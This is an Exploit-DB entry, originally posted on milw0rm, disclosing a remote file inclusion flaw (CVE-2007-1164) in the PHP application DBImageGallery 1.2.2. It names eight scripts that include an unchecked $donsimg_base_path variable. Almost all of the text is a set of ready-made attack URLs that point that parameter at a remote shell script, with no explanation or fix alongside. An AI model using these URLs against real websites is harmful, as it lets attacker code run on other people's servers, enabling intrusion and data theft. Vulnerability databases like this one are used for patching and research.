DBImageGallery 1.2.2 donsimg_base_path RFI Vulnerabilities

2007-02-21T00:00:00
ID EDB-ID:3353
Type exploitdb
Reporter Denven
Modified 2007-02-21T00:00:00

Description

DBImageGallery 1.2.2 (donsimg_base_path) RFI Vulnerabilities. CVE-2007-1164. Webapps exploit for php platform

                                        
                                            DBImageGallery 1.2.2
 
*****************
Found by Denven *
*****************
Script: http://www.dbscripts.net/download/?file=1
*****************
ERROR:
 
admin/attributes.php                      require_once $donsimg_base_path
admin/images.php                          require_once $donsimg_base_path
admin/scan.php                            require_once $donsimg_base_path
includes/attributes.php                   require_once $donsimg_base_path
includes/db_utils.php                     require_once $donsimg_base_path
includes/images.php                       require_once $donsimg_base_path
includes/utils.php                        require_once $donsimg_base_path
includes/values.php                       require_once $donsimg_base_path
 
 
 
**************************************************************************************
RFI:
 
http://SITE.com/path/admin/attributes.php?donsimg_base_path=[SHELL]
http://SITE.com/path/admin/images.php?donsimg_base_path=[SHELL]
http://SITE.com/path/admin/scan.php?donsimg_base_path=[SHELL]
http://SITE.com/path/includes/attributes.php?donsimg_base_path=[SHELL]
http://SITE.com/path/includes/db_utils.php?donsimg_base_path=[SHELL]
http://SITE.com/path/includes/images.php?donsimg_base_path=[SHELL]
http://SITE.com/path/includes/utils.php?donsimg_base_path=[SHELL]
http://SITE.com/path/includes/values.php?donsimg_base_path=[SHELL]
 

**************************************************************************************
denven[at]gmail[dot]com

# milw0rm.com [2007-02-21]